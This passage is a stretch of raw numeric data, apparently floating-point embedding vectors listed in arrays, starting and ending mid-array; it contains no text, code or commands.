.013005418,-0.009902441,-0.0009113402,-0.02337127,0.0019553378,0.010249836,-0.0019915688,0.009517251,0.025682626,0.029032724,-0.0201177,-0.00799477,-0.030824,0.0028000923,0.00387349,-0.003511617,-0.038898982,0.005834243,0.019950617,-0.018648967,0.00313793,0.0044819065,-0.0013974045,-0.0010679029,-0.032003317,-0.018423924,-0.0115104085,-0.014168468,-0.007975467,-0.004948999,-0.0048099877,-0.043746054,0.0056872014,0.0034505976,-0.016059564,0.0065739197,-0.00576832,-0.037031,-0.014226024,-0.018812386,0.022377683,-0.012045813,-0.00032006623,0.004258466,0.007136779,-0.0063391924,-0.037142664,-0.021445008,-0.0022466586,-0.0064463136,0.024531553,-0.008952514,-0.003637406,0.013280584,-0.0045904517,0.002712103,-0.0041335095,0.006640005,0.007586309,0.019385071,0.014659844,-0.0074669407,-0.0076767295,-0.024546117,-0.009497971,-0.006697311,0.010941241,-0.007433092,0.034602474,0.009656005,-0.03272562,0.0051063513,-0.0003402397,0.00399815,-0.0071521173,0.01591161,0.017799344,-0.0028158415,-0.014465743,-0.007337642,-0.00010471377,0.017517444,0.013291505,-0.0104142325,0.012408037,-0.02240005,0.0041378103,-0.0374435,-0.02376504,0.038942188,0.0008813595,0.007908619,-0.0073910034,0.023949675,0.00038596988,-0.006531469,0.023397498,-0.00034367593,0.0041102716,-0.0093621425,0.020194562,0.012099573,-0.0077522276,-0.024384495,-0.009472504,0.0020172421,0.015654642,-0.010882962,-0.0130114565,-0.011470845,0.00082164124,-0.021824256,0.003457277,-0.017974874,0.026269216,-0.009822185,0.009354061,-0.018905144,-0.005240334,0.016367367,0.016235927,-0.01588461,0.019330833,0.011501445,0.010241653,-0.004672194,0.000117655305,-0.0062316684,-0.0095155835,0.017618442,0.009137891,-0.016527694,-0.007878463,0.014830307,-0.032998156,0.021475606,0.0007267071,0.0035974705,0.010668082,-0.0000093957615,-0.018817613,0.0120868925,0.026973415,0.038049217,0.026029078,-0.0076060547,-0.021041654,-0.01534109,0.025337467,-0.010956154,-0.0036797905,-0.016060412,-0.0453989,-0.008508883,0.005708698,-0.008151898,0.0017173123,0.0073487903,-0.0027333335,-0.019773971,-0.0072763064,-0.0032843824,-0.009646441,0.028235726,0.028885683,0.004423775,0.02586643,-0.0011382968,-0.013469762,-0.02023555,0.0064792777,-0.0056401943,-0.03490548,0.0021648544,0.002092491,0.006442284,0.0238391,0.004300335,-0.00592847,0.005356751,-0.0060528456,-0.00878088,0.0034696022,0.024807775,-0.0118702855,0.011898779,0.025955128,0.00026214463,-0.0095763095,-0.015105359,0.0045921537,0.0001354135,0.011481378,-0.007325306,0.005057251,-0.009463367,0.02423915,0.0070192735,-0.012963962,0.0055454625,0.010770182,-0.022163628,-0.005811029,-0.0048905355,0.0040832427,-0.018601192,0.03347654,0.021820392,0.007534967,-0.0048926757,-0.014845452,-0.020455938,0.026032042,-0.015801448,0.01618838,-0.021943536,-0.004200698,-0.008833937,-0.009239165,0.014000512,-0.008897965,-0.012039388,-0.00047806493,0.010129709,0.009804263,-0.004444519,-0.0015305594,0.0066770264,-0.010698305,-0.0069931177,0.017193163,-0.01956213,0.02386423,0.0045842044,0.020410614,0.016338423,0.014469866,0.008546488,-0.009234683,0.007071086,0.012809907,-0.005628199,-0.0012326511,0.0009916608,0.06915812,-0.004977278,0.0006634452,-0.0067615644,0.014420795,-0.007647609,0.026231136,0.0009513582,0.001138715,-0.005075626,0.0031613219,-0.013587657,0.017052624,-0.022212813,-0.027554262,0.020424154,0.0067752968,-0.000045475314,-0.031058475,-0.017249027,-0.00066548353,-0.028438618,0.0064514875,0.024251208,0.0035167246,-0.06482278,0.03518155,0.013201681,-0.012137684,0.01614663,0.015433421,0.00983819,0.015911482,0.005155268,-0.016071515,-0.014114801,0.013798316,0.0060077854,0.020721888,0.009156089,0.0027587002,0.011912445,0.00088166405,-0.010193564,-0.019517066,0.011791329,0.001699395,-0.023607047,0.026651956,-0.0017574981,-0.011068035,0.030298328,0.012974309,-0.02185567,-0.004265329,0.011636065,0.007892119,0.0041372227,-0.02128733,0.006749429,0.024654176,-0.007656445,0.0028053606,0.0032015592,0.01123687,0.0046187686,-0.020543676,-0.025455123,-0.015173554,0.0123265395,-0.013920668,-0.009219527,-0.010418794,0.0022716627,-0.0032423593,0.013426134,-0.017655356,0.004234825,-0.003509992,0.0029786667,0.01050468,0.012745352,-0.019435644,0.00539431,-0.008523193,0.013853262,0.0038283626,-0.0042500123,-0.0052935984,-0.0026755496,-0.0050997515,0.0034296184,-0.0066813505,0.006753832,-0.023841117,0.015636135,0.0059348186,-0.014046678,-0.00010882562,-0.020720847,-0.013433746,-0.0024843104,0.016282542,0.011512299,-0.005174557,-0.003804628,-0.0057292446,0.034811355,-0.01249414,0.009837252,0.02320507,0.02441674,-0.024052378,0.0039619342,-0.020488862,0.007977066,-0.012490908,-0.014330598,0.025927076,-0.015576311,0.00332945,-0.00250455,0.014215604,0.01803301,0.008870796,0.0082130805,0.009110765,0.010383576,0.0070289164,0.005927373,0.002681681,-0.025053566,-0.020382281,-0.0053640585,0.0042071994,-0.017353555,0.04379711,0.019962385,0.009034276,-0.016795665,0.008545914,-0.004812684,0.008616376,-0.0015355179,0.0022159277,-0.0072584916,0.01920379,0.007666364,0.0097319875,0.0076806783,-0.0032978998,-0.0016204525,-0.0002355664,-0.0040772823,-0.0035364197,0.0035132752,-0.0067483797,-0.0102274455,0.0015872229,-0.0052556433,-0.0042025996,0.013915558,-0.010819264,-0.031897638,0.004326496,0.000789569,0.0069070444,-0.0031535649,0.015933083,0.01128409,-0.01675188,-0.018292138,-0.0045016124,0.030549617,-0.0027135157,0.0065110913,-0.0032160229,0.033207178,-0.02303798,0.00017094106,0.018181473,-0.010276458,-0.017355155,0.0025882476,0.0154044395,0.012067859,-0.015344756,0.022184381,-0.01229679,0.033037003,0.01193853,0.01999134,0.006551816,0.00027081196,0.00519539,-0.004683696,-0.019154165,0.021287132,-0.01531546,-0.031986378,0.0053739385,-0.01866976,-0.008467521,-0.018441854,0.016748052,-0.009426247,0.00695815,-0.0053152237,-0.014853615,0.0019948115,-0.00039391202,-0.005114233,0.0016207639,-0.02335468,-0.011300235,0.009310729,-0.018576732,-0.0019452077,-0.012540578,0.020030504,0.014156491,-0.013531845,-0.02227086,-0.00016003578,-0.022357691,0.0019376404,0.008142121,0.00069227035,0.014166989,-0.0068501905,-0.007602432,-0.007848726,-0.0142580895,-0.022869887,-0.0030294869,-0.011819463,0.007547636,0.014742971,0.009339405,-0.008734958,0.007472737,-0.01470883,-0.011842292,-0.009350768,-0.037457973,-0.000102647165,0.01607756,-0.005754968,-0.013261552,-0.035441503,-0.007584313,0.0040694755,-0.022064181,-0.017013375,-0.0011815993,-0.0060486896,-0.011313417,0.005661188,0.00024332468,-0.01402375,0.00033306348,0.028558668,0.018537235,-0.0035405783,0.011476067,-0.014862594,0.011437007,-0.018333925,-0.012302895,0.0018504927,-0.018514998,-0.013914829,-0.021814762,-0.004239901,-0.009832018,0.013725036,-0.030950906,-0.00503944,-0.010773346,0.015552117,0.0153689245,-0.012935684,0.016428648,-0.003988279,-0.0059044957,0.0077370163,0.025110966,0.015417227,0.024140352,-0.03483469,0.0074958373,0.052041575,-0.008546925,-0.016534595,0.016618274,-0.0030825797,-0.077736296,-0.02680526,0.04382729,-0.0043219686,-0.01871259,-0.028766567,0.031064268,0.0011291462,-0.004353888,-0.027652344,-0.015361783,0.0022661353,-0.018490763,0.023795407,-0.0006276254,-0.004022165,0.002041986,-0.026319271,-0.026259014,-0.00906146,0.0041497997,0.0074128746,-0.00004694921,0.0053719287,0.020753019,-0.018282523,-0.0013124986,-0.01255201,0.011682668,0.003194127,0.004777763,-0.03128888,-0.004218603,-0.028625576,0.0027487169,-0.01860882,0.030530527,-0.0037219874,-0.0068262657,0.02226633,-0.013111288,0.10299877,0.015288432,-0.04151901,-0.0073719923,-0.009279596,-0.0065432675,-0.01088567,0.0040923874,-0.0055303066,0.013607959,-0.0085505005,0.027774492,0.009084983,0.010059897,0.030515797,-0.010687996,-0.013658368,0.11680046,0.014247429,-0.00024685884,0.037252758,0.006633972,0.018123027,0.011106227,-0.0010927704,-0.064340554,-0.004924021,-0.018290734,0.0005302556,-0.002605602,0.0072194603,0.022187032,-0.0034208237,-0.004846278,0.013935758,0.014450645,-0.005371337,-0.011603965,-0.021999877,-0.00556564,0.010220829,-0.013811211,-0.00016220576,0.0038161045,-0.008435483,0.028377436,-0.018413594,0.0020503767,0.030643584,0.021104932,-0.004176398,0.010806395,0.019258898,-0.0018031481,0.012740191,-0.00052448426,0.005059946,0.00605437,-0.012560976,0.019962724,0.003299602,0.009701724,-0.032402538,0.028626634,0.004610218,0.0009058305,-0.017080272,-0.033481985,-0.005336488,0.0033374082,0.020415641,-0.011486283,-0.037080113,0.0024285486,-0.010286224,0.0034537027,-0.018640855,-0.013554785,0.024899404,-0.016329255,0.046784773,0.023797004,-0.0039314087,-0.012423109,-0.0029018223,0.034352154,-0.00091361237,0.0010474314,0.03156981,-0.010119746,-0.010858518,0.02536773,-0.00045868315,-0.0077552977,0.0070582232,0.0022291394,-0.015220499,0.0031536068,0.0031369291,-0.024762958,-0.0059845657,-0.005234412,-0.011106995,0.011105569,-0.0066617453,-0.017025687,-0.016935015,0.0000047437347,-0.033010706,0.0035857756,0.02184282,0.015501106,-0.014199747,0.0029425316,-0.028438028,-0.0103936875,-0.0030678492,0.020463457,-0.0064855753,-0.0016949917,-0.00014591918,-0.01805138,0.016537396,0.0009104569,-0.057516035,-0.019312125,-0.0032609985,0.0074302237,-0.020421669,-0.011926338,-0.00015324181,-0.00063402654,0.012761644,0.020167124,0.02138721,-0.014609442,-0.01823694,-0.029780202,-0.021470122,-0.015138589,0.015860036,0.018740004,0.002646559,0.01877551,0.011185986,-0.011063482,-0.0027226387,0.022978645],[-0.02123769,-0.0033433004,-0.014036023,-0.0030481096,0.0034274322,-0.028916674,0.0025499521,0.01904857,0.007167029,-0.005535781,0.0073481193,0.042674948,-0.012039961,-0.002051689,-0.022669686,-0.020049693,0.021565,0.0009253408,0.024573566,0.005817298,0.0040370263,-0.012136734,0.011819033,-0.00048109467,0.012963739,0.0052828593,-0.0044290265,-0.0065823505,0.0016296192,-0.0006205573,0.011706385,0.00068875746,-0.011304324,-0.011970728,0.01953299,0.010069851,-0.008199988,0.005574211,0.0012755083,-0.0140786115,-0.001315043,0.0066179577,-0.0026116034,0.01757478,-0.015794886,-0.023423458,-0.0043266746,-0.014660707,-0.017825967,-0.012170124,0.018298531,0.0045638233,-0.014865062,0.023897575,-0.017418314,0.002238987,-0.0075485185,-0.018672086,0.03302007,-0.01884391,-0.00961498,0.019189635,-0.008664116,-0.008998806,0.028494326,-0.007592812,0.0028422792,-0.0062208977,-0.019224858,-0.014531224,0.018948171,-0.014553493,0.009850708,-0.0055893445,-0.008882377,0.0112956595,0.004989729,-0.0061797155,-0.013248784,-0.02048712,-0.042674843,-0.012988082,0.01383866,-0.012734666,0.009193776,0.001170573,-0.020182628,-0.010728436,-0.0005585321,-0.0062301843,-0.006680882,0.015176376,0.0024398295,0.01219328,0.0059215166,0.014977017,0.02508013,0.0118518835,0.0060778977,0.00021744054,-0.012971368,-0.013139535,-0.022647597,0.0034823825,-0.004372953,-0.015203078,-0.0004098964,0.0111674415,0.0060552345,-0.0019808947,-0.0010403752,-0.0015146884,0.008279875,0.000056836983,-0.0012784333,-0.018510183,-0.009041989,-0.002458917,-0.0096161,-0.005537072,-0.004694305,0.011712772,-0.005997212,0.020337218,-0.015796734,-0.010509139,0.0006414198,0.0036373402,-0.009743374,0.0050231987,-0.004921831,0.015669672,-0.0152645465,0.021583501,-0.00026518796,0.000009024752,0.0023112402,0.012159014,-0.0013728748,-0.016179644,0.027502459,0.012109151,0.02422521,0.028323026,0.007603902,0.012205299,0.0064317025,0.009323775,0.02169986,-0.004391234,0.020945387,-0.00018788988,0.012766713,-0.022469051,-0.0015027834,-0.0021157204,-0.0061890907,0.006500185,-0.02146365,0.014606941,-0.0068357512,-0.006427721,0.0062892563,0.021750078,0.0020757983,-0.0015641114,0.017847389,-0.0043284185,-0.017092438,-0.008486767,0.012169836,0.021842612,0.025653813,-0.015629336,0.0073594633,-0.0018130576,0.0026734108,-0.0062698005,-0.0038790444,0.025419444,0.0031400926,0.007601436,-0.013693328,0.01040554,0.007290757,0.031334072,0.0008081348,0.022221113,0.0008159374,-0.0082289,-0.0028365161,-0.02348534,0.0023873323,0.006657754,-0.023280485,-0.0013128562,0.004459668,0.115851305,-0.0062796706,-0.022920286,0.0044942084,-0.005352371,-0.0036519517,-0.044091143,-0.010534364,-0.0026574314,-0.023108777,0.015786817,0.025115428,-0.002628967,0.028329097,-0.012717032,0.015032282,0.0046636118,0.01585114,-0.07900176,0.0080094505,0.018443253,0.0019355698,0.016762514,0.009352374,0.00052971963,0.012128044,-0.012073044,-0.007547496,0.009030076,0.020222463,0.009457987,0.010528235,-0.040742304,0.010404895,0.00807135,-0.024350705,-0.01117765,-0.019026441,-0.032835793,0.008320883,0.014636123,0.0063676853,-0.01884868,0.012787704,0.009235321,0.004253968,-0.00066176924,0.006096419,0.005949668,0.023967173,-0.00811354,-0.01469766,-0.017162923,-0.0025689986,-0.006678316,-0.001995648,0.01921092,-0.0010825829,-0.01425904,-0.0062411465,0.0014112863,-0.011549069,0.015053146,-0.011385427,0.001811271,-0.026969533,0.0096630715,0.031531107,0.011762312,-0.0043199863,-0.036866207,-0.017609924,0.00071176374,-0.03024243,0.02027009,0.0025847575,-0.009919398,0.0015195188,0.0055584274,0.02034364,0.003321121,0.012449226,-0.0044508246,-0.008760354,0.0000928273,-0.027271474,-0.013675857,-0.020085199,-0.016995737,0.0047135716,0.010164978,0.029165516,-0.010627438,-0.0010869333,0.01738352,0.019045562,-0.003726447,-0.004756496,-0.0026476602,-0.027230082,0.029603388,0.0078599565,-0.011280557,-0.0046712896,-0.01961876,0.030268576,0.002983321,-0.00012278781,0.0027913423,0.0040316256,0.041580558,0.0044970224,0.012148456,-0.0028208466,-0.0063070226,0.0034533956,-0.0040450287,0.0037146914,0.013693993,0.009122611,-0.006876478,0.0006586236,-0.010404387,0.02090316,-0.0110984305,-0.018533321,-0.0062803547,0.0056909844,-0.011426894,0.03320437,0.012344135,0.013794249,0.023906277,0.0012783579,0.0017955616,0.0049560564,0.021656187,-0.010225089,0.014405714,0.001932984,0.021711506,0.008288338,0.02426692,-0.010094599,0.0061486163,-0.011035352,-0.0022342429,-0.0016588508,0.011167718,-0.0057525486,-0.0043292902,0.0121106375,-0.012416697,0.021012014,0.00547397,-0.0059023197,0.023669932,-0.013901536,-0.016187577,-0.01021581,-0.0065291817,-0.0026650948,-0.0001369823,0.006261695,0.0024858518,0.0319712,0.0038128202,0.07287407,0.011595567,0.002432183,0.0025387544,0.011791965,-0.016031668,0.02292071,0.004263361,0.017854327,-0.0082199145,-0.01672432,-0.015207745,-0.0006872604,0.018040799,-0.006745125,0.011208085,-0.020161014,0.015319748,-0.012135649,-0.013050582,0.03738577,0.013786639,-0.018373284,0.005930633,0.03709271,-0.00268465,0.013559011,-0.0065297037,-0.023942783,-0.0008633053,0.004383057,-0.016224733,-0.024623284,-0.009762697,-0.016536659,0.0043262504,0.022976309,-0.0019731645,-0.0025455717,-0.016606137,0.00071362243,-0.012126217,-0.007032048,0.018352667,-0.023973634,0.028956395,0.018194217,-0.017012868,-0.0050988845,0.0011348994,-0.0034644168,0.02047225,-0.028169472,0.0041774893,-0.0234086,0.012080879,0.021746062,-0.023745613,0.009923146,0.01965668,0.036630638,0.01724988,-0.031073518,0.0067619006,-0.0015247728,0.024389327,0.006999886,-0.0045366776,-0.026108375,0.006258023,0.006806784,0.014246152,0.012375006,0.02302874,-0.022763168,0.0016522575,-0.01225248,-0.018662805,-0.008674891,0.0054333815,0.007757603,-0.010965952,0.0015693271,0.005539568,-0.010398756,-0.004668408,0.005891349,-0.00011685328,0.020226188,0.0009552063,0.011014908,0.0076285996,-0.009138418,-0.0151993595,0.039330963,0.0052977293,0.016176533,-0.016770931,0.010721031,0.0012873204,-0.008353096,0.008329202,0.013105636,0.0001614077,-0.0131547935,0.0011288803,-0.0036823465,-0.018291773,0.0071775103,0.019545816,-0.0070228176,-0.012346794,-0.0027603337,0.014835491,0.0081444,0.008957984,0.008728277,-0.0063625635,-0.029900385,0.0141334515,0.024577972,-0.010640417,0.009671987,0.004438815,-0.01733081,0.012695215,0.0020737678,-0.01755145,0.0066322084,0.018586185,0.0155103225,0.0067693884,-0.006302769,-0.036321264,-0.012734012,0.011851614,-0.007654858,-0.013459587,0.029209124,-0.007979717,0.0073251454,0.0067790654,0.024075763,0.006845473,0.0062756115,0.0043588975,0.0195689,0.00026285887,-0.000047681555,-0.011759374,-0.010188717,-0.009011753,-0.0033358897,-0.007267298,0.015548024,0.0065851556,0.032547724,-0.021433892,-0.012446772,-0.005247873,0.027667107,-0.013201541,0.00782768,0.009086358,0.0031829502,0.010897954,0.0026875266,0.0660499,0.009010016,-0.008662103,-0.0136641795,0.01709234,0.008220699,0.002673315,0.012898811,-0.036252093,0.0054864534,-0.0013083307,-0.005752016,0.006770191,0.007229685,-0.02724354,-0.0028459,-0.0024934176,-0.0025271878,-0.00006646531,0.007827393,-0.004376824,-0.0072118514,-0.033168733,-0.025053123,-0.010130303,-0.015150412,0.004459445,0.019511271,0.0071559,-0.0023558515,-0.032351565,-0.004421901,-0.0012520242,-0.0019464315,0.016902048,0.005337263,-0.0019482394,-0.004742703,-0.01088676,0.029954672,-0.0114941085,0.0005621221,0.0015266981,0.028934687,0.009265653,-0.007332872,0.000020129262,0.01380869,0.007495183,-0.0012202811,-0.016927885,0.03208875,0.012312343,-0.013416352,-0.008244929,-0.008811448,0.008761957,0.016529616,-0.0138369715,0.01671393,0.026749946,0.014121696,-0.00183714,-0.017896693,0.0123126935,-0.0036916484,0.0006873225,-0.010030135,-0.006678355,-0.021674711,0.020674635,0.021399241,0.0009255853,-0.0059907692,0.016080983,0.0007636316,0.0123714665,0.01938759,0.005916941,-0.009873516,0.01454429,0.02203154,-0.01212952,-0.000980911,-0.007914559,-0.01259419,-0.0063751307,0.023247583,0.010074264,-0.03529927,0.0068329517,0.011462483,0.01952707,0.014612358,0.010842624,0.019171722,-0.02891729,-0.000095116,-0.0069443122,0.0049309884,0.00934436,-0.03467297,0.0048464006,0.026929127,0.0026955178,0.01087663,0.0016677865,-0.01027123,0.020301504,0.0006465847,-0.003076204,-0.045326624,-0.005018983,0.018907262,0.017602153,-0.0087714335,0.05949633,-0.013352367,0.0035887526,0.009300342,0.0131392265,-0.011003918,0.0070480905,-0.00092796097,-0.0033481813,0.0019503601,-0.009906933,-0.02104307,-0.022222592,-0.017912649,-0.027250338,0.012172283,0.032003235,-0.012860943,0.0075536342,0.0071308175,0.008832254,0.0052564293,-0.0107690515,0.007355139,-0.006688555,-0.0025035846,-0.00068256655,0.0056714555,0.00093731104,0.0071408525,-0.00035410703,-0.008398119,0.019699318,-0.0055746986,-0.005756423,0.009607193,-0.019617777,-0.01891675,-0.0047062864,-0.029986544,0.021580108,0.004469453,0.0141875325,-0.0054695196,0.009676313,-0.009749131,-0.0015564935,-0.0024767292,0.0072183125,-0.0038052762,0.014507814,-0.0029224097,0.021974145,-0.005743044,-0.0065828944,-0.0058545917,0.00027281814,0.008804676,-0.0004378051,0.018200282,0.031052629,0.02020759,0.006377023,-0.018227521,0.0025821582,-0.0010440354,0.013346337,0.0023667489,-0.0016168475,0.007311859,0.015650997,0.012468868,0.018127924,0.0028000388,-0.007238158,-0.0025470462,-0.0039824643,-0.0040310137,0.017124843,-0.01005955,-0.03212865,0.0026297502,-0.0057541477,0.009980507,0.0039472487,-0.0067014885,-0.01407172,-0.003435563,-0.0057666763,0.010365688,0.0027295013,-0.008172011,-0.035445504,-0.03278313,0.033849783,0.030648122,0.005713864,-0.013251763,-0.011658135,0.002708114,-0.015630614,-0.03287973,-0.017871791,-0.008317469,0.030261584,-0.009953262,0.022995908,0.00027214014,0.0023535423,0.03427124,0.042487662,-0.010064198,0.002701688,-0.0075314436,-0.0013085806,0.017927982,0.025514187,-0.0042638527,-0.0032569512,-0.007264995,0.020982502,-0.02283862,0.003359329,0.0022024084,0.034132093,0.016320685,-0.004603598,-0.01254208,0.00060322654,-0.023450656,-0.016638746,0.0039385604,-0.0049426616,0.001130746,-0.011258382,0.0031549039,-0.03442837,0.0144024175,-0.016847067,0.021484634,-0.0019979756,-0.007813341,0.0038987657,-0.0071927398,0.0011500629,0.022187375,0.0144435465,-0.022198906,0.015700394,-0.016864305,0.015732953,-0.0072505013,0.000024162855,-0.0021545126,0.0008709353,-0.018603075,-0.009754613,0.010530011,-0.014627566,0.011602352,0.017477602,-0.030213822,0.030016601,-0.011795809,0.008570379,0.004684429,0.019561667,-0.0052063605,-0.012847247,-0.001280257,-0.015521184,-0.013244938,0.018179476,-0.0014065113,-0.015118686,0.0044442913,-0.023609268,-0.029561192,0.0044977833,0.008499189,0.017961692,0.02203394,-0.0041871793,0.004134254,-0.0044773608,0.008599402,0.0071397778,0.0017198414,-0.0298642,0.0013624474,-0.016186997,-0.0048993756,-0.0030814663,0.004253219,0.00010141347,0.02889758,0.00924802,-0.0013050797,0.0078506395,0.009911404,0.00017715998,0.006281118,-0.0013569775,0.00036761205,-0.0128325345,0.009206682,0.003175326,0.0055832607,0.0009715888,-0.001751605,0.0061284797,0.010283365,-0.0066965874,-0.029601792,0.0033994636,0.0019932075,-0.013686726,0.0023031821,0.0015482841,-0.0033868037,0.0010407057,0.0023740719,0.01683552,0.01409705,0.021531323,0.0073800753,0.007015701,-0.0072602634,-0.014104282,0.0020242326,-0.006437339,-0.004328881,-0.0014996334,-0.0011637015,-0.004244944,0.010309331,0.0070410105,-0.0076790666,0.0025457477,-0.0027152307,-0.004073493,0.011093687,-0.019977693,-0.006716008,-0.009857394,0.008458282,-0.03836086,0.0009916031,-0.005603511,0.024580989,0.010316157,0.0040438967,0.005240728,-0.00013750995,-0.0046808836,0.026130997,0.0011682097,0.009186417,-0.009643945,0.012617179,0.0038912883,0.012783515,0.0049500167,-0.022690728,0.020584961,0.013775478,0.03477984,-0.006499901,0.013229606,-0.020795468,0.024833435,-0.011883501,-0.017488066,-0.0015942715,-0.0020299528,0.004879879,0.020840803,0.01768456,-0.020424865,-0.0003112298,-0.013736058,0.0026841834,0.027619211,-0.0044570486,-0.010586537,-0.019908715,-0.0023546978,0.013608539,-0.018339569,-0.0005962229,-0.012740874,-0.069211565,0.015533019,0.015887052,-0.00053731917,-0.003591506,0.00991349,0.03692639,-0.0053798445,0.029757863,-0.00659822,0.00093814626,-0.01660977,-0.004255158,-0.004114099,-0.0020836764,-0.013287325,-0.010362015,0.015264195,0.017128685,-0.00064365426,-0.012134227,0.01693225,0.004361305,0.0027705948,0.020840447,-0.025506718,0.01308547,-0.0031622031,-0.018372165,0.0064016017,0.0044434383,0.03499094,-0.016630428,0.02652285,-0.0061174515,-0.04015205,0.0047039036,0.00087555463,-0.0030281893,0.0080631785,-0.010130728,0.0024581426,0.0055699316,0.022987546,-0.009201598,-0.014168133,-0.007763191,-0.008828804,0.0068995208,-0.028497878,0.018182209,-0.0024656234,0.022215797,0.029976148,0.009271205,0.011796662,0.0075845914,0.012769906,-0.0053508063,-0.0014301426,0.00368271,-0.00060117804,0.003687857,0.024375167,-0.0061949897,0.0045266165,0.0003247442,0.0056900256,0.01587982,-0.0033229645,-0.005641879,0.001064871,0.005647803,0.016691988,-0.003850692,0.025783962,0.010321703,-0.0004655414,-0.0012852356,-0.010757816,-0.005563614,-0.0008909362,-0.045271564,0.010483823,-0.026433606,-0.001153963,-0.005885788,0.0013873067,-0.0033278607,-0.018864078,-0.00044391197,-0.0017179463,-0.0045294366,0.007889598,-0.019413168,0.025864432,0.0028478832,0.014719154,-0.0005806695,-0.020630246,0.026772214,-0.007271824,-0.02365047,0.03461483,-0.025463156,0.0007646133,-0.001286379,0.010536922,0.024337258,0.017772019,-0.0019737189,-0.032409247,0.017248964,-0.0044184914,0.014213806,-0.0055290586,-0.0025218483,-0.0030848724,0.06488471,-0.004060566,-0.0026870766,-0.016094668,0.010168028,-0.00028490837,-0.016765231,0.009822078,0.022344416,0.022544984,-0.017460555,0.017328693,0.0008369014,0.009276599,-0.0141399745,-0.012475546,0.016121862,0.00161278,0.015878908,0.0030813904,-0.011252777,0.0077370373,-0.001765661,-0.025163237,-0.008093421,0.012344543,-0.0034877975,0.00048344553,-0.014467906,0.011919581,-0.014784454,0.022669604,-0.0026034382,-0.014255474,-0.0064300736,-0.012912341,-0.015968563,0.008780844,0.025966046,-0.022615824,-0.00089889043,-0.0040797307,-0.014602098,-0.02411983,-0.007834315,0.0065257493,-0.028373023,-0.01313234,-0.0067549925,-0.0062974556,-0.018910201,0.0037975165,0.013619181,-0.0030104415,-0.011845617,0.002813631,0.0052279825,-0.007399661,0.0155932475,-0.008152118,-0.03153732,0.0155380685,-0.002342361,0.017332278,0.0026997004,0.012970131,0.029588023,-0.004230792,-0.012318593,-0.015755631,-0.01407137,-0.028697848,-0.006315106,0.03410574,0.008781995,0.018387046,-0.0134511655,-0.0041613844,0.003564003,0.011845302,-0.011334602,0.008351272,-0.0090011405,0.017846014,-0.014323042,0.0005520634,-0.021215726,0.008375191,0.009983766,-0.02292564,-0.013175728,0.0074089677,-0.012988324,-0.00920006,-0.042093407,0.0016330979,-0.014753714,0.0008191593,-0.002908258,0.030982785,0.012134941,-0.025770357,0.0032603825,0.009032776,0.014579175,-0.022004418,0.009304218,-0.0057973783,0.00051186985,0.007384232,0.007970255,0.0011713086,0.03694213,-0.022160148,0.034307353,-0.004723263,-0.013281849,0.016419232,-0.0007707317,0.0116145825,-0.010212908,-0.020592887,0.0068554725,0.005579821,0.0050476096,-0.0048907744,0.039602287,0.043458376,-0.01094353,-0.004589149,-0.008631719,0.010432323,-0.0069421423,-0.005250471,0.00469431,-0.0050633233,-0.02170332,-0.004023874,0.0045185634,-0.01053312,0.00058500585,0.0016623571,0.0073385504,-0.016000904,0.009288787,-0.001525563,-0.005298004,-0.01414242,0.020121338,0.008435046,0.013166561,0.0015233188,-0.0012242934,0.008624992,0.0019994401,-0.0072348453,0.006872024,0.0005374757,-0.033308793,-0.0032446608,0.019092083,0.009530911,-0.0059863077,-0.0013334063,0.007365317,-0.02314069,-0.002185824,0.034931228,0.000005999063,-0.050908145,0.021548908,-0.019141464,-0.0019205894,0.014774949,-0.01536726,0.018272096,0.0043861386,-0.012203163,0.019779198,-0.015386113,-0.0034182402,-0.011693058,0.043988615,-0.006353343,0.013088838,-0.019228108,-0.01025606,-0.012818193,0.0028854248,0.009139512,-0.000786469,-0.010190673,-0.0119272955,-0.016482085,0.020309545,-0.026322598,0.0063683977,-0.005207082,0.013897589,-0.005434664,-0.0045521106,0.025001803,0.015566251,0.00607146,-0.001065225,0.010076091,-0.009141255,0.019056343,0.0045914333,-0.008072163,-0.031290837,-0.01806848,-0.0089240605,0.008079066,0.0019085492,0.029534975,-0.015826158,0.012414064,-0.0064910874,-0.015053794,0.0036929597,-0.004866852,0.016045386,-0.01193464,0.06909191,0.0063098893,0.00816573,0.0072154277,-0.0058321166,0.022279272,0.034512747,-0.021839662,0.009651069,0.014078526,-0.0016730792,-0.0041458425,-0.0042512985,0.01760713,-0.010204228,0.021823468,0.022416512,0.0062488667,0.014308996,-0.007433482,-0.0067693577,-0.001207611,-0.013522688,-0.0015403818,0.009371055,-0.0014088392,0.017602071,-0.022927966,0.00022703948,0.01692014,-0.011310387,-0.019897297,0.009218332,0.008546739,0.030326545,-0.024605362,-0.0018106496,-0.0094971405,-0.0017627196,-0.018070744,0.029518683,0.024905501,-0.0036067145,-0.01057377,0.016556881,-0.01925425,0.07479128,0.013906428,0.013831839,-0.018095832,0.010906365,0.011703633,-0.006556092,0.017214367,0.0002695085,0.008892293,0.0008537812,0.015787365,-0.012474382,0.0102229435,0.019794576,-0.0020085005,-0.007983218,-0.0047470783,0.007989446,-0.027297255,-0.0032732636,0.0037704199,0.01011946,0.010481926,0.0008176211,0.015237707,-0.010802668,0.014657287,0.012148692,-0.028043756,-0.006734979,-0.014773841,0.010897603,-0.0009959881,0.022757212,-0.06770601,0.009247329,0.27348253,-0.00812365,0.010311355,0.007452345,0.013521397,0.0067434963,-0.14232023,-0.0070597734,0.008685542,0.012278878,-0.0053484193,-0.034589756,-0.03265501,0.011769436,0.020819278,0.00961481,0.0021668586,-0.028878206,0.051325664,-0.01798623,0.026790762,0.008421696,0.0076159895,0.008125717,-0.0153701585,-0.011249282,0.021062154,-0.020418966,0.0024589112,0.0088294735,0.0023117864,-0.010191515,-0.012534459,-0.00047146267,-0.03952015,0.0044142166,0.009972197,-0.0057136244,0.00066295016,-0.039299894,0.017936142,0.011024133,-0.030285405,-0.011585403,-0.17909563,0.031496305,0.016217919,-0.011644757,0.016230028,0.005104266,0.01097389,-0.0010960735,0.006245701,-0.0413775,-0.019361492,0.021068012,-0.012449866,-0.0007419105,-0.0023500344,-0.015293383,0.0057724006,0.013602601,0.019951425,-0.002154884,0.025736712,-0.006746684,-0.021741532,-0.0015893759,0.0035519511,-0.0144896265,0.00249435,0.0036021026,-0.009011263,0.0102132205,-0.02131359,0.01738194,-0.0022755517,0.012084943,-0.0038846438,-0.005915099,-0.010421623,0.031033723,-0.015019808,0.0065945876,0.016177515,-0.0038257863,-0.015382393,-0.0016821993,-0.012128811,0.017338542,0.009088931,-0.011137133,0.02246209,0.012882708,0.04170705,0.010475503,-0.033816215,0.016869662,0.0036965562,0.0015055478,-0.0076343026,-0.01644574,0.000006274964,0.014159981,-0.003509325,-0.018920531,-0.0147382235,-0.015609192,